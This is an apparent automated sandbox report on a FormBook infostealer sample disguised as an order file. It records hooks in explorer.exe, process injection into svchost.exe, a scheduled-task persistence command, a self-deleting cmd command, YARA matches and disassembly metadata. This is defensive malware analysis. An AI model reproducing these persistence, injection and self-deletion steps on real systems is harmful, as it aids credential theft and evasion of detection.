                                    Jun 11, 2021 13:30:58.625556946 CEST5175INHTTP/1.1 301 Moved Permanently
                                    Server: nginx/1.16.1
                                    Date: Fri, 11 Jun 2021 11:30:58 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Location: https://dan.com/domain-seller/future-parallel?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3DR3Chi1RjI9I2gNlG9lXXXNlrydudUfV5dRmlhE
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Code Manipulations

                                    User Modules

                                    Hook Summary

                                    Function NameHook TypeActive in Processes
                                    PeekMessageAINLINEexplorer.exe
                                    PeekMessageWINLINEexplorer.exe
                                    GetMessageWINLINEexplorer.exe
                                    GetMessageAINLINEexplorer.exe

                                    Processes

                                    Process: explorer.exe, Module: user32.dll
                                    Function NameHook TypeNew Data
                                    PeekMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEC
                                    PeekMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEC
                                    GetMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEC
                                    GetMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEC

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: Order 275594 04-D4E5A.exe PID: 2024 Parent PID: 5792

                                    General

                                    Start time:13:29:02
                                    Start date:11/06/2021
                                    Path:C:\Users\user\Desktop\Order 275594 04-D4E5A.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe'
                                    Imagebase:0x10000
                                    File size:954880 bytes
                                    MD5 hash:3F4CC7F69F0D3B70A20DFD2243BC16DB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: schtasks.exe PID: 6040 Parent PID: 2024

                                    General

                                    Start time:13:29:45
                                    Start date:11/06/2021
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EDclkRlYpO' /XML 'C:\Users\user\AppData\Local\Temp\tmp285B.tmp'
                                    Imagebase:0x20000
                                    File size:185856 bytes
                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: conhost.exe PID: 4180 Parent PID: 6040

                                    General

                                    Start time:13:29:46
                                    Start date:11/06/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6b2800000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: Order 275594 04-D4E5A.exe PID: 3596 Parent PID: 2024

                                    General

                                    Start time:13:29:49
                                    Start date:11/06/2021
                                    Path:C:\Users\user\Desktop\Order 275594 04-D4E5A.exe
                                    Wow64 process (32bit):true
                                    Commandline:{path}
                                    Imagebase:0xe00000
                                    File size:954880 bytes
                                    MD5 hash:3F4CC7F69F0D3B70A20DFD2243BC16DB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: explorer.exe PID: 3388 Parent PID: 3596

                                    General

                                    Start time:13:29:52
                                    Start date:11/06/2021
                                    Path:C:\Windows\explorer.exe
                                    Wow64 process (32bit):false
                                    Commandline:
                                    Imagebase:0x7ff714890000
                                    File size:3933184 bytes
                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: svchost.exe PID: 5392 Parent PID: 3388

                                    General

                                    Start time:13:30:16
                                    Start date:11/06/2021
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\svchost.exe
                                    Imagebase:0x1130000
                                    File size:44520 bytes
                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: cmd.exe PID: 1332 Parent PID: 5392

                                    General

                                    Start time:13:30:20
                                    Start date:11/06/2021
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:/c del 'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe'
                                    Imagebase:0xa0000
                                    File size:232960 bytes
                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Analysis Process: conhost.exe PID: 5780 Parent PID: 1332

                                    General

                                    Start time:13:30:20
                                    Start date:11/06/2021
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6b2800000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Disassembly

                                    Code Analysis

                                    Reset < >

                                      Analysis Process: Order 275594 04-D4E5A.exe PID: 2024 Parent PID: 5792 Order 275594 04-D4E5A.exeCOMMON

                                      Executed Functions

                                      Function 00AA37A2, Relevance: 4.0, Strings: 3, Instructions: 209COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: 278$lMOm$lMOm
                                      • API String ID: 0-1565864076
                                      • Opcode ID: 9e28a3cca7ba6be1b25639f7397e73b6cf605c01e472e0d9980a69dd07e8667f
                                      • Instruction ID: c5167912030208bce5b93c25548918d70e6f8e0b3b1b4ded49a337a2c7a52510
                                      • Opcode Fuzzy Hash: 9e28a3cca7ba6be1b25639f7397e73b6cf605c01e472e0d9980a69dd07e8667f
                                      • Instruction Fuzzy Hash: F0916DB5E05258DFCF14DFA1E998AADBBB1FF4A340F20852AE00AAB395D7345945CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA37C4, Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: 278$lMOm
                                      • API String ID: 0-2876074530
                                      • Opcode ID: 42fd2fbfec4494c8d522a42949764f1dbb50698d3f3b83cfa2b9536b3efa87c7
                                      • Instruction ID: 57c1157bd14350ad749427ec47216802553572cc6366516ca432ab12685c2b17
                                      • Opcode Fuzzy Hash: 42fd2fbfec4494c8d522a42949764f1dbb50698d3f3b83cfa2b9536b3efa87c7
                                      • Instruction Fuzzy Hash: 068129B5E01218DFCF14DFA5D998AAEBBB1FB4A340F20852AE40AA7394DB345945CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA017E, Relevance: 1.6, APIs: 1, Instructions: 118nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00AA3505
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID:
                                      • API String ID: 1778838933-0
                                      • Opcode ID: b8a63c2de4c497052bf592c352be4b27282b86eaee6e8a08a218b09436c83211
                                      • Instruction ID: aa4ff80cb17e454a80b8ce7562b5a33af599e1ac117c166163062594172a7025
                                      • Opcode Fuzzy Hash: b8a63c2de4c497052bf592c352be4b27282b86eaee6e8a08a218b09436c83211
                                      • Instruction Fuzzy Hash: 8141DBB5D092889FCF11CFA9D884ADEFBB4BF0A314F14906AE814B7251D335A905CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA01A4, Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00AA3505
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID:
                                      • API String ID: 1778838933-0
                                      • Opcode ID: d9f464b963fb7fa7bb6250fd4e86d9e4e30b0c84e98acda1c1fe6e33e654e359
                                      • Instruction ID: 05fefe1c59676728bf5c04f3cade9499f3e573cfb147abcc053f04f2544d6c80
                                      • Opcode Fuzzy Hash: d9f464b963fb7fa7bb6250fd4e86d9e4e30b0c84e98acda1c1fe6e33e654e359
                                      • Instruction Fuzzy Hash: CA4176B9D042589FCF10CFAAD984ADEFBB5BB0A314F10902AE914B7310D375AA45CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA3449, Relevance: 1.6, APIs: 1, Instructions: 102nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 00AA3505
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: InformationProcessQuery
                                      • String ID:
                                      • API String ID: 1778838933-0
                                      • Opcode ID: ab6f958ed91c531d506e1c0f55fe62c513cd12b582d8ea66734a522bb9bdaac3
                                      • Instruction ID: 35ec4cc013830df507b93500e453f9f76d57c5afb5db96b440f2e3426e0e406a
                                      • Opcode Fuzzy Hash: ab6f958ed91c531d506e1c0f55fe62c513cd12b582d8ea66734a522bb9bdaac3
                                      • Instruction Fuzzy Hash: BA4176B9D042589FCF10CFAAD984ADEFBB5BB09310F10902AE918B7310D735A945CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04460B80, Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: `&^<
                                      • API String ID: 0-771038736
                                      • Opcode ID: f1658cc0828d411e26f76de29b31a38cf676ad0829559028689098d8f0def8c5
                                      • Instruction ID: f60e9247ac2087b304fe1b79de4148550da27825fd152a75cb8830aff0dee8ac
                                      • Opcode Fuzzy Hash: f1658cc0828d411e26f76de29b31a38cf676ad0829559028689098d8f0def8c5
                                      • Instruction Fuzzy Hash: 5D712B70E06218DFDF14CFE5E5846DDFBB6EB89310F20942BE406B7254E774AA428B15
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04460B76, Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: `&^<
                                      • API String ID: 0-771038736
                                      • Opcode ID: 18170b2f9a8491ff0117c71c456e55680a0a785daaedfeecde8ac0a44b18c2f1
                                      • Instruction ID: e03a87235208ffb21fdcf96e3cb6ad5571354714a4ae6e84128af8f55f4c0ff6
                                      • Opcode Fuzzy Hash: 18170b2f9a8491ff0117c71c456e55680a0a785daaedfeecde8ac0a44b18c2f1
                                      • Instruction Fuzzy Hash: 47712A70E06218DFDF14CFE5E5846DEFBB6EB89310F20942BE406B7254E774AA428B15
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04463212, Relevance: .2, Instructions: 235COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 152e6a2a1b410ef91ec83c8e8696e63efbe702ee5759748654ba019c59428bf6
                                      • Instruction ID: 55585420c951bcfe897b4d5b7cdf482ef3be074d8618641b6c9e3c2ba7b023fe
                                      • Opcode Fuzzy Hash: 152e6a2a1b410ef91ec83c8e8696e63efbe702ee5759748654ba019c59428bf6
                                      • Instruction Fuzzy Hash: AB914B74E19249DFCF14CFA5D5805ADFBB2FB89310F14A42AD807BB214EB34A9428F16
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA2D78, Relevance: .1, Instructions: 138COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f38fd73ceb79d8fd1db57e12c7bb7ee5cf6658e6475018d5b2a74b00818b9fb0
                                      • Instruction ID: b7070fbe1eb006dc0d02d7527f9fb86aea0a4989a162cfe62e21aa6c23fb6c01
                                      • Opcode Fuzzy Hash: f38fd73ceb79d8fd1db57e12c7bb7ee5cf6658e6475018d5b2a74b00818b9fb0
                                      • Instruction Fuzzy Hash: 9F512674D01208DFCB14DFA9E9886AEBBB1FF89301F20852AD416B73A4DB345A55DF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA3218, Relevance: .1, Instructions: 130COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8080b2f474bbf8da0543ab031e6338f9c52140996c2e879b15197b462a543fcb
                                      • Instruction ID: 846df083c05ba51776e5bf4375d1194b408a5b18dd899684f30abcb1e4345d3e
                                      • Opcode Fuzzy Hash: 8080b2f474bbf8da0543ab031e6338f9c52140996c2e879b15197b462a543fcb
                                      • Instruction Fuzzy Hash: FC510371E14609DBCF14CFEAC8405DDFBB2BF99300F20862AE519AB254EB706A46CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04463369, Relevance: .1, Instructions: 112COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b48fd6234ae556049add522efd20d2d5e9c94fc8e4939dff934ea29ab840e3b6
                                      • Instruction ID: 93c1436db197b773c710681c26689d0fb6562ced3cfe4a626e518ffd492fa011
                                      • Opcode Fuzzy Hash: b48fd6234ae556049add522efd20d2d5e9c94fc8e4939dff934ea29ab840e3b6
                                      • Instruction Fuzzy Hash: B3411B74E19249DFCF14CFA4D98059DFBB2FF45220F10651AD407BB254EB34A942CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AAFDA8, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 00AAFE08
                                      • GetCurrentThread.KERNEL32 ref: 00AAFE45
                                      • GetCurrentProcess.KERNEL32 ref: 00AAFE82
                                      • GetCurrentThreadId.KERNEL32 ref: 00AAFEDB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: 0c4e5301c43486d7f52cfcef713c649217542c3873b9b71c51d677072b586d31
                                      • Instruction ID: 5772dcbbc791147f4c819051d17ebc92498f817ec8599939210c720d7c048ec2
                                      • Opcode Fuzzy Hash: 0c4e5301c43486d7f52cfcef713c649217542c3873b9b71c51d677072b586d31
                                      • Instruction Fuzzy Hash: 7A5157B09007498FDB24DFA9D948BEEBBF0EB49314F208469E419A73A0D7746944CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 044624C4, Relevance: 1.7, APIs: 1, Instructions: 226processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 044626AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 9ed407e8c6d774818f1c017bb756d63fb706417bb8c24b2403d9b391f8ae3a92
                                      • Instruction ID: b90ee51e168a265db16107db4dec8ac27fb9d45a0cb21d7d323f62b1f43953a0
                                      • Opcode Fuzzy Hash: 9ed407e8c6d774818f1c017bb756d63fb706417bb8c24b2403d9b391f8ae3a92
                                      • Instruction Fuzzy Hash: 1181E075D00269DFDF20DFA5C880BDDBBB1BB49304F1191AAE509B7260DB70AA85CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 044624D0, Relevance: 1.7, APIs: 1, Instructions: 222processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 044626AC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: c185859e2c2180961b435380f24b09a32ea535bfa6dc1cb9b04bebc1869f6bb7
                                      • Instruction ID: f1f2550db3a824a2b7335ab417f3bc7006fa157b218c23dc154343faa6fde577
                                      • Opcode Fuzzy Hash: c185859e2c2180961b435380f24b09a32ea535bfa6dc1cb9b04bebc1869f6bb7
                                      • Instruction Fuzzy Hash: 5881E074D002699FDF20DFA5C880BDDBBB5BB49304F1191AAE509B7260DB70AA85CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AA7FEC, Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00AA9571
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.303878225.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: false
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: bf4c9d3a88fb20fd90601dd011235981a25572652107fe510bf0d07184128b02
                                      • Instruction ID: 61ff1ae7dff500884972cdc1a0e47b715390225f1870f7658c4ab9ac112464f2
                                      • Opcode Fuzzy Hash: bf4c9d3a88fb20fd90601dd011235981a25572652107fe510bf0d07184128b02
                                      • Instruction Fuzzy Hash: 4051C571D0462C9FDB20DFA4C840B9EBBF5AF45308F1181AAD509BB251DB716A89CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04462C68, Relevance: 1.6, APIs: 1, Instructions: 115injectionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04462D46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 69b91edd71e00afc98d4a960e57e915a510e9706e1beea0b4ef424781ec9384f
                                      • Instruction ID: ce3f9572916b7ddf810d7f855f4a849e18cb3170e7644bc32ac9db006a2f0ccf
                                      • Opcode Fuzzy Hash: 69b91edd71e00afc98d4a960e57e915a510e9706e1beea0b4ef424781ec9384f
                                      • Instruction Fuzzy Hash: 174189B5D002589FCF10CFA9D984ADEFBF1BB49314F24902AE819BB350D374AA45CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04462C70, Relevance: 1.6, APIs: 1, Instructions: 112injectionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04462D46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: d5e053b9f26acfde91144e00ef6c854e6bada65fc73644deb798495f5571f605
                                      • Instruction ID: cb40752e4ea768b7823bc068dcf073cb91ec9f839854fde2a40d7e7207755cb2
                                      • Opcode Fuzzy Hash: d5e053b9f26acfde91144e00ef6c854e6bada65fc73644deb798495f5571f605
                                      • Instruction Fuzzy Hash: 674178B9D002589FCF10CFA9D984ADEFBF1BB49314F24906AE819B7350D374AA45CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04462A38, Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04462AF5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: 5600d18a4ba0b43286f648b2a3ce8215e4a170fb99dc57b42b787c111ca6b03a
                                      • Instruction ID: 6c4688f76ace4d87c57c13711b307fc29cbec5ead978279db4604120261465d1
                                      • Opcode Fuzzy Hash: 5600d18a4ba0b43286f648b2a3ce8215e4a170fb99dc57b42b787c111ca6b03a
                                      • Instruction Fuzzy Hash: 444197B9D042589FCF10CFAAD984ADEFBB5BB09310F10906AE815B7310D375A946CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04462A40, Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                      Download Yara Rule
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04462AF5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: a5ebb75e65a08ce300651d77df1a444c2072cfd5b362973133cebaccdbf8cd18
                                      • Instruction ID: 4c2032eb3d7413d996e1ee5c5bddf8b0cd5f66e6489c6ac45a4b45c69746b14e
                                      • Opcode Fuzzy Hash: a5ebb75e65a08ce300651d77df1a444c2072cfd5b362973133cebaccdbf8cd18
                                      • Instruction Fuzzy Hash: 154196B9D042589FCF10CFAAD984ADEFBB5BB09310F10906AE815B7310D375A946CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04462B59, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04462C0D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 8ca154375f3b4380f167178424d677b1eeb8d8858a2b4bee2b8fee3ed03b3648
                                      • Instruction ID: 47670f07a54c57b913760ca0a49bfc4aa81f78ec0a32654704f29f1630165a40
                                      • Opcode Fuzzy Hash: 8ca154375f3b4380f167178424d677b1eeb8d8858a2b4bee2b8fee3ed03b3648
                                      • Instruction Fuzzy Hash: 0A3186B8D00258AFCF10CFA9D984ADEFBB0BB19310F10A02AE815B7310D775A946CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04462B60, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04462C0D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305226573.0000000004460000.00000040.00000001.sdmp, Offset: 04460000, based on PE: false
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: a607762a471b1453300631d0b15cfd302fc6c0506f51488b815d86fa98605b45
                                      • Instruction ID: 4e5f84b15dc21c45653ac90ff5fdc03a3c3e97ae6c2dc785aac4500dac196ea6
                                      • Opcode Fuzzy Hash: a607762a471b1453300631d0b15cfd302fc6c0506f51488b815d86fa98605b45
